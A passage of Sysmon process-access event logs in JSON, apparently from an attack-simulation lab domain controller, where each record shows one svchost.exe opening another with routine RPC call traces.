C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.190","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":962,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.190\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.190","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":963,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.190\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.190","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":964,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.190\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.190","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":965,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.190\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.190","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":966,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.190\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.190","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":967,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.206\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.206","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":968,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.206\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.206","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":969,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.206\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 